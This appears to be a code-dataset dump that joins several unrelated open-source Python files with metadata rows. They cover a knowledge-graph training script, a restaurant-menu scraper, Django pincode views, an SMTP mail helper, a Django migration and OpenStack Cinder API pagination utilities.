triples = [(q.s, str(q.r[0]), q.t) for q in train if len(q.r) == 1]
train_graph = Graph(triples)
train_neg_gen = NegativeGenerator(train_graph, max_negative_samples_train,
positive_branch_factor, type_matching_negs
)
# specify the objective to maximize
objective = CompositionalModel(train_neg_gen, path_model=path_model,
objective='margin')
# initialize params if not already initialized
if init_params is None:
init_params = objective.init_params(
dset.entity_list, dset.relations_list, wvec_dim, model=path_model,
hidden_dim=hidden_dim, init_scale=init_scale, glove_path=glove_path)
save_wait = 1000 # save parameters after this many steps
eval_samples = 200 # number of examples to compute objective on
# define Observers
observers = [NormObserver(report_wait), SpeedObserver(report_wait),
ObjectiveObserver(eval_samples, report_wait)]
# this Observer computes the mean rank on each split
rank_observer = RankObserver({'train': train, 'test': test},
dset.full_graph, eval_samples,
max_negative_samples_eval, report_wait,
type_matching_negs=True)
observers.append(rank_observer)
# define Controllers
controllers = [BasicController(report_wait, save_wait, max_steps),
DeltaClipper(), AdaGrad(), UnitNorm()]
trainer = OnlineMaximizer(
train, test, objective, l2_reg=l2_reg, approx_reg=True,
batch_size=batch_size, step_size=step_size, init_params=init_params,
controllers=controllers, observers=observers)
return trainer
dset = parse_dataset(dataset_path, dev_mode=False, maximum_examples=100)
warm_start = params_path is not None
if warm_start:
print 'loading warm start params...'
init_params = load_params(params_path, path_model)
else:
init_params = None
print_header('single-edge training')
# train the model on single edges
one_hop_only = lambda queries: [q for q in queries if len(q.r) == 1]
trainer0 = build_trainer(
one_hop_only(dset.train), one_hop_only(dset.test),
max_steps_single, step_size_single, init_params
)
params0 = trainer0.maximize()
params_single = copy.deepcopy(params0)
print_header('path training')
# train the model on all edges, with warm start from single-edge model
trainer = build_trainer(dset.train, dset.test, max_steps_path,
step_size_path, params0)
params_comp = trainer.maximize()
print_header('evaluation')
def report(queries, model, neg_gen, params):
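    # For each query, score the true target against all type-matching
    # negatives; mean quantile and hits@10 summarise ranking quality
    # over the split.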
scores = lambda query: model.predict(params, query).ravel()
def compute_quantile(query):
s, r, t = query.s, query.r, query.t
negatives = neg_gen(query, 't')
pos_query = PathQuery(s, r, t)
neg_query = PathQuery(s, r, negatives)
# don't score queries with no negatives
if len(negatives) == 0:
query.quantile = np.nan
else:
query.quantile = util.average_quantile(scores(pos_query), scores(neg_query))
query.num_candidates = len(negatives) + 1
for query in util.verboserate(queries):
compute_quantile(query)
# filter out NaNs
queries = [q for q in queries if not np.isnan(q.quantile)]
mean_quantile = np.mean([q.quantile for q in queries])
hits_at_10 = np.mean([1.0 if util.rank_from_quantile(q.quantile, q.num_candidates) <= 10 else 0.0 for q in queries])
print 'mean_quantile:', mean_quantile
print 'h10', hits_at_10
return mean_quantile, hits_at_10
# used for all evaluations
neg_gen = NegativeGenerator(dset.full_graph, float('inf'), type_matching_negs=True)
print_header('path query evaluation')
print '--Single-edge trained model--'
mq, h10 = report(dset.test, trainer0.objective, neg_gen, params_single)
util.metadata(('path_queries', 'SINGLE', 'mq'), mq)
util.metadata(('path_queries', 'SINGLE', 'h10'), h10)
print
print '--Compositional trained model--'
mq, h10 = report(dset.test, trainer.objective, neg_gen, params_comp)
util.metadata(('path_queries', 'COMP', 'mq'), mq)
util.metadata(('path_queries', 'COMP', 'h10'), h10)
print
print_header('single edge evaluation')
print '--Single-edge trained model--'
mq, h10 = report(one_hop_only(dset.test), trainer0.objective, neg_gen, params_single)
util.metadata(('single_edges', 'SINGLE', 'mq'), mq)
util.metadata(('single_edges', 'SINGLE', 'h10'), h10)
print
print '--Compositional trained model--'
mq, h10 = report(one_hop_only(dset.test), trainer.objective, neg_gen, params_comp)
util.metadata(('single_edges', 'COMP', 'mq'), mq)
util.metadata(('single_edges', 'COMP', 'h10'), h10)
| mit | 2,815,330,726,600,916,500 | 33.650888 | 120 | 0.664788 | false | 3.477435 | true | false | false |
lesleymaraina/DataScience.Restaurants | ingest/ingest.py | 1 | 9239 |
"""
An ingest module
"""
from lxml import html
import requests
import json
from bs4 import BeautifulSoup
import re
#Python 3
import urllib.request
# #Python 2
# import urllib
import pymongo
import os
import pickle
class IngestSystem(object):
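    # End-to-end scraper: collect restaurant URLs per city, cache the raw
    # HTML under raw_data/, then parse the saved pages into records.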
def __init__(self, cl):
self.cities = cl
def pull_and_load(self):
'''
l = self.get_city_urls()
r = []
for city in l:
print(city)
one_city = self.get_restaurant_urls(city)
print(one_city)
# Get the 100 most popular restaurants for each city
#for w in one_city[:100]:
for w in one_city: ## Additional DC restaurants ONLY to pull all restaurants
if ('menu' in w[0]) and ('kids' not in w[0]):
r.append(w)
pickle.dump(r,open('restaurant_url_list.txt','wb'))
r=pickle.load(open('restaurant_url_list.txt', 'rb'))
print(len(r))
self.store_raw(r[200:300])
'''
self.build_database()
def get_city_urls(self):
url_list = []
for i in self.cities:
url_list.append(('http://www.allmenus.com/'+i['state']+'/'+i['city']+'/-/?sort=popular', i['city'], i['state']))
return url_list
def get_restaurant_urls(self, url_citystate_tuple):
uct = url_citystate_tuple
a = HTMLReader(uct[0])
citysoup = a.html_to_soup()
urllist = a.soup_to_urllist(citysoup, uct[1], uct[2])
return urllist
def store_raw(self, rest_list):
for r in rest_list:
splt = r[0].split('/')
a = HTMLReader('http://www.allmenus.com'+r[0])
restsoup = a.html_to_soup()
with open("raw_data/"+splt[1]+"_"+splt[2]+"_"+splt[3]+".html", "w") as f:
print("Writing "+splt[1]+"_"+splt[2]+"_"+splt[3]+".html")
f.write(restsoup.prettify())
def build_database(self):
l = []
for filenm in os.listdir('raw_data/'):
if filenm != '.DS_Store':
tmp = Restaurant(filenm).db_obj()
if (len(tmp['menu']) >= 1) and (tmp['latitude'] != 9999) and (tmp['type'] != ""):
l.append(tmp)
print(len(l))
'''
conn = pymongo.MongoClient()
db = conn.rdata
for i in l:
print("Insert "+i['name'])
db.restaurants.insert_one(i)
'''
self.final_rlist = l
class HTMLReader(object):
def __init__(self, uct):
self.url = uct
def html_to_soup(self):
html = urllib.request.urlopen(self.url).read()
soup = BeautifulSoup(html, "lxml")
return soup
def soup_to_urllist(self, soup, cityname, statename):
tmp = []
match = '/'+statename
for u in soup.findAll("a", href=True):
if (u['href'])[:3] == match:
tmp.append((u['href'], cityname, statename))
return tmp
def build_info(self):
pass
def build_menu(self):
pass
class Restaurant(object):
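    # Parses one saved allmenus.com page: address and geo fields come from
    # itemprop microdata, ratings get averaged, and <li> entries become
    # menu items in db_obj().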
def __init__(self, filenm):
soup = BeautifulSoup(open('raw_data/'+filenm, 'r'), "lxml")
self.name = soup.find("h1", {"itemprop": "name"}).string.strip()
self.street = soup.find("span", {"itemprop": "streetAddress"}).string.strip()
self.city = soup.find("span", {"itemprop": "addressLocality"}).string.strip()
self.state = soup.find("span", {"itemprop": "addressRegion"}).string.strip()
self.zip = soup.find("span", {"itemprop": "postalCode"}).string.strip()
self.lat = str(soup.find("meta", {"itemprop": "latitude"}))
self.lng = str(soup.find("meta", {"itemprop": "longitude"}))
self.ratings = soup.findAll(attrs = {"itemprop": "ratingValue"})
self.msoup = soup.findAll("li")
def db_obj(self):
r={}
l=[]
r['name'] = self.name
r['street'] = self.street
r['city'] = self.city
r['state'] = self.state
r['zip'] = self.zip
# Add geolocation information
try:
r['latitude'] = float(re.findall(r'"(.*?)"', self.lat)[0])
r['longitude'] = float(re.findall(r'"(.*?)"', self.lng)[0])
except ValueError:
r['latitude'] = float(9999.000)
r['longitude'] = float(9999.000)
#Create a city group for suburb city names
a = self.city
if a in ['Dunwoody', 'East Point', 'Sandy Springs']:
r['city_group'] = 'Atlanta'
elif a in ['Alsip', 'Cicero', 'Evergreen Park', 'Harwood Heights', 'Elmwood Park']:
r['city_group'] = 'Chicago'
elif a in ['Hollywood', 'West Hollywood']:
r['city_group'] = 'Los Angeles'
elif a in ['Greenfield', 'Wauwatosa', 'West Allis']:
r['city_group'] = 'Milwaukee'
elif a in ['South Austin']:
r['city_group'] = 'Austin'
else:
r['city_group'] = a
        # Take an average of ratings, or else assign 0.0 when there are none
if len(self.ratings) == 0:
r['avg_rating'] = 0.0
else:
num=0
count=0
for i in self.ratings:
num=num+float(i['content'])
count=count+1
r['avg_rating'] = num/float(count)
# Add a blank to cuisine type is missing data
if self.msoup[0].string:
r['type'] = self.msoup[0].string.strip()
else:
r['type'] = ""
# Create a second consolidated cusine type
if self.msoup[0].string:
a = self.msoup[0].string.strip()
if a in ['Ethiopian']:
r['type_2'] = 'African'
elif a in ['Hawaiian', 'Local/Organic', 'American (New)']:
r['type_2'] = 'American'
elif a in ['Breakfast', 'Bakery & Pastries', 'Coffee & Tea']:
r['type_2'] = 'Bakery, Breakfast & Coffee'
elif a in ['Gastropub', 'Pub Food']:
r['type_2'] = 'Bar Food'
elif a in ['Hot Dogs', 'Burgers']:
r['type_2'] = 'Burgers & Hot Dogs'
elif a in ['Dominican', 'Jamaican']:
r['type_2'] = 'Caribbean'
elif a in ['Asian Fusion', 'Taiwanese']:
r['type_2'] = 'Chinese'
elif a in ['Sandwiches', 'Deli Food']:
r['type_2'] = 'Deli & Sandwiches'
elif a in ['Ice Cream', 'Crepes']:
r['type_2'] = 'Desserts'
elif a in ['Austrian', 'British', 'Eastern European', 'Eclectic & International', 'Spanish', 'French', 'Belgian', 'Irish', 'German', 'Polish']:
r['type_2'] = 'European'
elif a in ['Puerto Rican', 'Brazilian', 'Central American']:
r['type_2'] = 'Latin American'
elif a in ['Greek']:
r['type_2'] = 'Mediterranean'
elif a in ['Sushi', 'Seafood']:
r['type_2'] = 'Seafood & Sushi'
elif a in ['Soul Food', 'Cajun & Creole']:
r['type_2'] = 'Southern'
elif a in ['Tex-Mex']:
r['type_2'] = 'Southwestern'
elif a in ['Chicago Grill']:
r['type_2'] = 'Steak'
elif a in ['Burmese', 'Malaysian']:
r['type_2'] = 'Thai'
elif a in ['Noodles']:
r['type_2'] = 'Vietnamese'
elif a in ['Pakistani']:
r['type_2'] = 'Middle Eastern'
elif a in ['Salads']:
r['type_2'] = 'Vegetarian'
else:
r['type_2'] = a
else:
r['type_2'] = ""
# Create menu, add blanks if either price or description fields are missing
for i in self.msoup:
m={}
if i.find("span","name") or i.find("span","price") or i.find("p", "description"):
if i.find("span","name"):
m["item"] = i.find("span","name").string.strip()
else:
m["item"] = ""
# For prices, set $0.00 to blanks and take the first price in a range of prices
if i.find("span","price"):
tmppr = i.find("span","price").string.strip()
tmppr = re.sub('[$]', '', tmppr)
print(tmppr)
if '-' not in tmppr:
if tmppr == "" or tmppr == " ":
m["price"] = ""
elif float(tmppr) == 0:
m["price"] = ""
else:
m["price"] = float(tmppr)
else:
if tmppr[0:tmppr.find('-')] == "" or tmppr[0:tmppr.find('-')] == " ":
m["price"] = ""
else:
m["price"] = float(tmppr[0:tmppr.find('-')])
else:
m["price"] = ""
if i.find("p","description"):
m["description"] = i.find("p","description").string.strip()
else:
m["description"] = ""
l.append(m)
r['menu'] = l
return r
| mit | 8,566,805,343,264,511,000 | 34.949416 | 155 | 0.471371 | false | 3.507593 | false | false | false |
Rahul91/Django_CRUD | pincode/views.py | 1 | 3469 | from django.shortcuts import render
from django.http import HttpResponse
from django.template.loader import get_template
from django.template import Context
from pincode.models import Pincode
from forms import PincodeForm
from django.http import HttpResponseRedirect
from django.core.context_processors import csrf
#from haystack.query import SearchQuerySet
# Create your views here.
def pincodes(request):
args = {}
args.update(csrf(request))
args['pincodes'] = Pincode.objects.all()
return render(request,"pincodes.html", args)
def pincodes_pincode(request):
args = {}
args.update(csrf(request))
args['pincodes'] = Pincode.objects.all().order_by('pincode')
return render(request,"pincodes.html", args)
def pincodes_state(request):
args = {}
args.update(csrf(request))
args['pincodes'] = Pincode.objects.all().order_by('state_name')
return render(request,"pincodes.html", args)
def pincodes_district(request):
args = {}
args.update(csrf(request))
args['pincodes'] = Pincode.objects.all().order_by('district_name')
return render(request,"pincodes.html", args)
'''
def pincode_single(request, pincode_id=1):
return render(request,"pincode.html", {'pincode' : Pincode.objects.get(id=pincode_id)})
'''
def pincode_single(request, pincode_id=1):
return render(request,"pincode_single.html", {'pincode' : Pincode.objects.get(id=pincode_id)})
def create(request):
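    # Classic create view: bind and save the form on POST, otherwise
    # render an empty form.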
if request.POST:
form = PincodeForm(request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect('/pincode/all')
else:
form = PincodeForm()
args ={}
args.update(csrf(request))
args['form'] = PincodeForm()
return render(request, "create_entry.html", args)
'''
def update(request, pincode_id=1):
if request.POST:
form = PincodeForm(request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect('/pincode/get/{{ pincode_id }}')
else:
form = PincodeForm()
args ={}
args.update(csrf(request))
args['form'] = PincodeForm()
return render(request, "update_entry.html", args)
'''
def update(request, pincode_id=1):
if request.POST:
form = PincodeForm(request.POST)
if form.is_valid():
pincode = form.cleaned_data['pincode']
office_name = form.cleaned_data['office_name']
district_name = form.cleaned_data['district_name']
state_name = form.cleaned_data['state_name']
new = Pincode.objects.get(id=pincode_id)
new.pincode = pincode
new.office_name = office_name
new.district_name = district_name
new.state_name = state_name
new.save()
return HttpResponseRedirect('/pincode/all/')
else:
form = PincodeForm()
args ={}
args.update(csrf(request))
args['form'] = PincodeForm()
return render(request,"update_entry.html", args)
'''
def search(request, id):
args = {}
args.update(csrf(request))
args['pincodes'] = Pincode.objects.filter(pincode__contains=id)
return render(request, "search_items.html",args)
def search_items(request):
if request.method == "POST":
search_text = request.POST['search_text']
else:
search_text = ''
form = PincodeForm()
args ={}
args.update(csrf(request))
args['form'] = PincodeForm()
return render(request,"search_items.html", args)
def search_pincodes(request):
    if request.method == "POST":
search_text = request.POST['search_text']
else:
search_text = ''
pincodes = Pincode.objects.filter(pincode__contains=search_text)
return render(request, "ajax_search.html", {'pincodes' : pincodes})
''' | mit | -1,278,550,043,495,505,200 | 23.785714 | 95 | 0.706255 | false | 3.053697 | false | false | false |
Kortemme-Lab/klab | klab/comms/mail.py | 1 | 4509 | #!/usr/bin/python
# encoding: utf-8
"""
mail.py
For email functions
Created by Shane O'Connor 2013
"""
from string import join
import email.Message
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from klab.fs.fsio import read_file
class MailServer(object):
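    # Thin wrapper around smtplib. sendmail() talks to the configured
    # host/port; the sendgmail* variants log in to smtp.gmail.com over
    # STARTTLS, reading the password from a local file. Example
    # (hypothetical addresses):
    #   MailServer('localhost', 25).sendmail('hi', '[email protected]', ['[email protected]'], 'hello')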
def __init__(self, host = None, port = None):
self.host = host
self.port = port
def sendmail(self, subject, sender, recipients, plaintext, htmltext=None, cc=None, debug=False, useMIMEMultipart=True):
if recipients:
if type(recipients) == type(""):
recipients = [recipients]
elif type(recipients) != type([]):
raise Exception("Unexpected type for recipients.")
if cc:
if type(cc) == type(""):
recipients.append(cc)
elif type(cc) == type([]):
recipients.extend(cc)
else:
raise Exception("Unexpected type for cc.")
recipients = join(recipients, ";")
if plaintext and htmltext and useMIMEMultipart:
msg = MIMEMultipart('alternative')
else:
msg = email.Message.Message()
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = recipients
msg['Reply-To'] = sender
if plaintext and htmltext and useMIMEMultipart:
part1 = MIMEText(plaintext, 'plain')
part2 = MIMEText(htmltext, 'html')
msg.attach(part1)
msg.attach(part2)
else:
msg.set_type("text/plain")
msg.set_payload(plaintext)
if debug:
print(msg)
else:
if self.host and self.port:
s = smtplib.SMTP(self.host, self.port)
elif self.host:
s = smtplib.SMTP(self.host)
else:
s = smtplib.SMTP()
s.connect()
s.sendmail(msg['From'], recipients, msg.as_string())
s.close()
return True
return False
def sendgmail(self, subject, recipients, plaintext, htmltext=None, cc=None, debug=False, useMIMEMultipart=True, gmail_account = '[email protected]', pw_filepath = None):
'''For this function to work, the password for the gmail user must be colocated with this file or passed in.'''
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
        smtpserver.ehlo()  # re-identify after STARTTLS; honour the caller's gmail_account
if pw_filepath:
smtpserver.login(gmail_account, read_file(pw_filepath))
else:
smtpserver.login(gmail_account, read_file('pw'))
for recipient in recipients:
if htmltext:
msg = MIMEText(htmltext, 'html')
msg['From'] = gmail_account
msg['To'] = recipient
msg['Subject'] = subject
smtpserver.sendmail(gmail_account, recipient, msg.as_string())
else:
header = 'To:' + recipient + '\n' + 'From: ' + gmail_account + '\n' + 'Subject:' + subject + '\n'
msg = header + '\n ' + plaintext + '\n\n'
smtpserver.sendmail(gmail_account, recipient, msg)
smtpserver.close()
def sendgmail2(self, subject, recipients, plaintext, htmltext=None, cc=None, debug=False, useMIMEMultipart=True, gmail_account = '[email protected]', pw_filepath = None):
'''For this function to work, the password for the gmail user must be colocated with this file or passed in.'''
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
        smtpserver.ehlo()  # re-identify after STARTTLS; honour the caller's gmail_account
if pw_filepath:
smtpserver.login(gmail_account, read_file(pw_filepath))
else:
smtpserver.login(gmail_account, read_file('pw'))
for recipient in recipients:
header = 'To:' + recipient + '\n' + 'From: ' + gmail_account + '\n' + 'Subject:' + subject + '\n'
if htmltext:
msg = header + '\n ' + htmltext + '\n\n'
else:
msg = header + '\n ' + plaintext + '\n\n'
smtpserver.sendmail(gmail_account, recipient, msg)
smtpserver.close() | mit | 632,048,279,746,665,200 | 38.217391 | 178 | 0.549346 | false | 4.132906 | false | false | false |
BenLatham/FLOSS-Agricultural-Simulation | simulation/migrations/0008_auto_20170828_2100.py | 1 | 3406 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-08-28 20:00
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('simulation', '0007_feeds_price'),
]
operations = [
migrations.CreateModel(
name='InternalTransfers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('quantity', models.FloatField()),
('unit_value', models.FloatField()),
('destination', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='xfers_in', to='simulation.Enterprises')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Goods')),
('origin', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='xfers_out', to='simulation.Enterprises')),
('rep', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Rep')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Purchases',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('quantity', models.FloatField()),
('unit_value', models.FloatField()),
('destination', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Enterprises')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Goods')),
('rep', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Rep')),
('vendor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.AccountsSupplier')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Sales',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('quantity', models.FloatField()),
('unit_value', models.FloatField()),
('buyer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.AccountsCustomer')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Goods')),
('origin', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Enterprises')),
('rep', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Rep')),
],
options={
'abstract': False,
},
),
migrations.AlterUniqueTogether(
name='feeds',
unique_together=set([('scenario', 'name')]),
),
migrations.AlterUniqueTogether(
name='feedtypes',
unique_together=set([('scenario', 'name')]),
),
]
| mit | 680,131,498,684,823,600 | 46.305556 | 150 | 0.571051 | false | 4.434896 | false | false | false |
mahak/cinder | cinder/api/common.py | 2 | 18596 | # Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import enum
import json
import os
import re
import urllib
from oslo_config import cfg
from oslo_log import log as logging
import webob
from cinder.api import api_utils
from cinder.api import microversions as mv
from cinder.common import constants
from cinder import exception
from cinder.i18n import _
api_common_opts = [
cfg.IntOpt('osapi_max_limit',
default=1000,
help='The maximum number of items that a collection '
'resource returns in a single response'),
cfg.StrOpt('resource_query_filters_file',
default='/etc/cinder/resource_filters.json',
help="Json file indicating user visible filter "
"parameters for list queries."),
]
CONF = cfg.CONF
CONF.import_opt('public_endpoint', 'cinder.api.views.versions')
CONF.register_opts(api_common_opts)
LOG = logging.getLogger(__name__)
_FILTERS_COLLECTION = None
ATTRIBUTE_CONVERTERS = {'name~': 'display_name~',
'description~': 'display_description~'}
METADATA_TYPES = enum.Enum('METADATA_TYPES', 'user image')
def get_pagination_params(params, max_limit=None):
"""Return marker, limit, offset tuple from request.
:param params: `wsgi.Request`'s GET dictionary, possibly containing
'marker', 'limit', and 'offset' variables. 'marker' is the
id of the last element the client has seen, 'limit' is the
maximum number of items to return and 'offset' is the number
of items to skip from the marker or from the first element.
If 'limit' is not specified, or > max_limit, we default to
max_limit. Negative values for either offset or limit will
cause exc.HTTPBadRequest() exceptions to be raised. If no
offset is present we'll default to 0 and if no marker is
present we'll default to None.
:max_limit: Max value 'limit' return value can take
:returns: Tuple (marker, limit, offset)
"""
max_limit = max_limit or CONF.osapi_max_limit
limit = _get_limit_param(params, max_limit)
marker = _get_marker_param(params)
offset = _get_offset_param(params)
return marker, limit, offset
def _get_limit_param(params, max_limit=None):
"""Extract integer limit from request's dictionary or fail.
Defaults to max_limit if not present and returns max_limit if present
'limit' is greater than max_limit.
"""
max_limit = max_limit or CONF.osapi_max_limit
try:
limit = int(params.pop('limit', max_limit))
except ValueError:
msg = _('limit param must be an integer')
raise webob.exc.HTTPBadRequest(explanation=msg)
if limit < 0:
msg = _('limit param must be positive')
raise webob.exc.HTTPBadRequest(explanation=msg)
limit = min(limit, max_limit)
return limit
def _get_marker_param(params):
"""Extract marker id from request's dictionary (defaults to None)."""
return params.pop('marker', None)
def _get_offset_param(params):
"""Extract offset id from request's dictionary (defaults to 0) or fail."""
offset = params.pop('offset', 0)
return api_utils.validate_integer(offset,
'offset',
0,
constants.DB_MAX_INT)
def limited(items, request, max_limit=None):
"""Return a slice of items according to requested offset and limit.
:param items: A sliceable entity
:param request: ``wsgi.Request`` possibly containing 'offset' and 'limit'
GET variables. 'offset' is where to start in the list,
and 'limit' is the maximum number of items to return. If
'limit' is not specified, 0, or > max_limit, we default
to max_limit. Negative values for either offset or limit
will cause exc.HTTPBadRequest() exceptions to be raised.
:kwarg max_limit: The maximum number of items to return from 'items'
"""
max_limit = max_limit or CONF.osapi_max_limit
marker, limit, offset = get_pagination_params(request.GET.copy(),
max_limit)
range_end = offset + (limit or max_limit)
return items[offset:range_end]
def get_sort_params(params, default_key='created_at', default_dir='desc'):
"""Retrieves sort keys/directions parameters.
Processes the parameters to create a list of sort keys and sort directions
that correspond to either the 'sort' parameter or the 'sort_key' and
'sort_dir' parameter values. The value of the 'sort' parameter is a comma-
separated list of sort keys, each key is optionally appended with
':<sort_direction>'.
Note that the 'sort_key' and 'sort_dir' parameters are deprecated in kilo
and an exception is raised if they are supplied with the 'sort' parameter.
The sort parameters are removed from the request parameters by this
function.
:param params: webob.multidict of request parameters (from
cinder.api.openstack.wsgi.Request.params)
:param default_key: default sort key value, added to the list if no
sort keys are supplied
:param default_dir: default sort dir value, added to the list if the
corresponding key does not have a direction
specified
:returns: list of sort keys, list of sort dirs
:raise webob.exc.HTTPBadRequest: If both 'sort' and either 'sort_key' or
'sort_dir' are supplied parameters
"""
if 'sort' in params and ('sort_key' in params or 'sort_dir' in params):
msg = _("The 'sort_key' and 'sort_dir' parameters are deprecated and "
"cannot be used with the 'sort' parameter.")
raise webob.exc.HTTPBadRequest(explanation=msg)
sort_keys = []
sort_dirs = []
if 'sort' in params:
for sort in params.pop('sort').strip().split(','):
sort_key, _sep, sort_dir = sort.partition(':')
if not sort_dir:
sort_dir = default_dir
sort_keys.append(sort_key.strip())
sort_dirs.append(sort_dir.strip())
else:
sort_key = params.pop('sort_key', default_key)
sort_dir = params.pop('sort_dir', default_dir)
sort_keys.append(sort_key.strip())
sort_dirs.append(sort_dir.strip())
return sort_keys, sort_dirs
def get_request_url(request):
url = request.application_url
headers = request.headers
forwarded = headers.get('X-Forwarded-Host')
if forwarded:
url_parts = list(urllib.parse.urlsplit(url))
url_parts[1] = re.split(r',\s?', forwarded)[-1]
url = urllib.parse.urlunsplit(url_parts).rstrip('/')
return url
def remove_version_from_href(href):
"""Removes the first API version from the href.
Given: 'http://cinder.example.com/v1.1/123'
Returns: 'http://cinder.example.com/123'
Given: 'http://cinder.example.com/v1.1'
Returns: 'http://cinder.example.com'
Given: 'http://cinder.example.com/volume/drivers/v1.1/flashsystem'
Returns: 'http://cinder.example.com/volume/drivers/flashsystem'
"""
parsed_url = urllib.parse.urlsplit(href)
url_parts = parsed_url.path.split('/')
# NOTE: this should match vX.X or vX
expression = re.compile(r'^v([0-9]+|[0-9]+\.[0-9]+)(/.*|$)')
for x in range(len(url_parts)):
if expression.match(url_parts[x]):
del url_parts[x]
break
new_path = '/'.join(url_parts)
if new_path == parsed_url.path:
msg = 'href %s does not contain version' % href
LOG.debug(msg)
raise ValueError(msg)
parsed_url = list(parsed_url)
parsed_url[2] = new_path
return urllib.parse.urlunsplit(parsed_url)
class ViewBuilder(object):
"""Model API responses as dictionaries."""
_collection_name = None
def _get_links(self, request, identifier):
return [{"rel": "self",
"href": self._get_href_link(request, identifier), },
{"rel": "bookmark",
"href": self._get_bookmark_link(request, identifier), }]
def _get_next_link(self, request, identifier, collection_name):
"""Return href string with proper limit and marker params."""
params = request.params.copy()
params["marker"] = identifier
prefix = self._update_link_prefix(get_request_url(request),
CONF.public_endpoint)
url = os.path.join(prefix,
request.environ["cinder.context"].project_id,
collection_name)
return "%s?%s" % (url, urllib.parse.urlencode(params))
def _get_href_link(self, request, identifier):
"""Return an href string pointing to this object."""
prefix = self._update_link_prefix(get_request_url(request),
CONF.public_endpoint)
return os.path.join(prefix,
request.environ["cinder.context"].project_id,
self._collection_name,
str(identifier))
def _get_bookmark_link(self, request, identifier):
"""Create a URL that refers to a specific resource."""
base_url = remove_version_from_href(get_request_url(request))
base_url = self._update_link_prefix(base_url,
CONF.public_endpoint)
return os.path.join(base_url,
request.environ["cinder.context"].project_id,
self._collection_name,
str(identifier))
def _get_collection_links(self, request, items, collection_name,
item_count=None, id_key="uuid"):
"""Retrieve 'next' link, if applicable.
The next link is included if we are returning as many items as we can,
given the restrictions of limit optional request parameter and
osapi_max_limit configuration parameter as long as we are returning
some elements.
So we return next link if:
1) 'limit' param is specified and equal to the number of items.
2) 'limit' param is NOT specified and the number of items is
equal to CONF.osapi_max_limit.
:param request: API request
:param items: List of collection items
:param collection_name: Name of collection, used to generate the
next link for a pagination query
:param item_count: Length of the list of the original collection
items
:param id_key: Attribute key used to retrieve the unique ID, used
to generate the next link marker for a pagination query
:returns: links
"""
item_count = item_count or len(items)
limit = _get_limit_param(request.GET.copy())
if len(items) and limit <= item_count:
return self._generate_next_link(items, id_key, request,
collection_name)
return []
def _generate_next_link(self, items, id_key, request,
collection_name):
links = []
last_item = items[-1]
if id_key in last_item:
last_item_id = last_item[id_key]
else:
last_item_id = last_item["id"]
links.append({
"rel": "next",
"href": self._get_next_link(request, last_item_id,
collection_name),
})
return links
def _update_link_prefix(self, orig_url, prefix):
if not prefix:
return orig_url
url_parts = list(urllib.parse.urlsplit(orig_url))
prefix_parts = list(urllib.parse.urlsplit(prefix))
url_parts[0:2] = prefix_parts[0:2]
url_parts[2] = prefix_parts[2] + url_parts[2]
return urllib.parse.urlunsplit(url_parts).rstrip('/')
def get_cluster_host(req, params, cluster_version=None):
"""Get cluster and host from the parameters.
This method checks the presence of cluster and host parameters and returns
them depending on the cluster_version.
If cluster_version is False we will never return the cluster_name and we
will require the presence of the host parameter.
If cluster_version is None we will always check for the presence of the
cluster parameter, and if cluster_version is a string with a version we
will only check for the presence of the parameter if the version of the
request is not less than it. In both cases we will require one and only
one parameter, host or cluster.
"""
if (cluster_version is not False and
req.api_version_request.matches(cluster_version)):
cluster_name = params.get('cluster')
msg = _('One and only one of cluster and host must be set.')
else:
cluster_name = None
msg = _('Host field is missing.')
host = params.get('host')
if bool(cluster_name) == bool(host):
raise exception.InvalidInput(reason=msg)
return cluster_name, host
def _initialize_filters():
global _FILTERS_COLLECTION
if _FILTERS_COLLECTION:
return
if not os.path.exists(CONF.resource_query_filters_file):
LOG.error(
"resource query filters file does not exist: %s",
CONF.resource_query_filters_file)
return
with open(CONF.resource_query_filters_file, 'r') as filters_file:
_FILTERS_COLLECTION = json.load(filters_file)
def get_enabled_resource_filters(resource=None):
"""Get list of configured/allowed filters for the specified resource.
This method checks resource_query_filters_file and returns dictionary
which contains the specified resource and its allowed filters:
.. code-block:: json
{
"resource": ["filter1", "filter2", "filter3"]
}
if resource is not specified, all of the configuration will be returned,
and if the resource is not found, empty dict will be returned.
"""
try:
_initialize_filters()
if not resource:
return _FILTERS_COLLECTION
else:
return {resource: _FILTERS_COLLECTION[resource]}
except Exception:
LOG.debug("Failed to collect resource %s's filters.", resource)
return {}
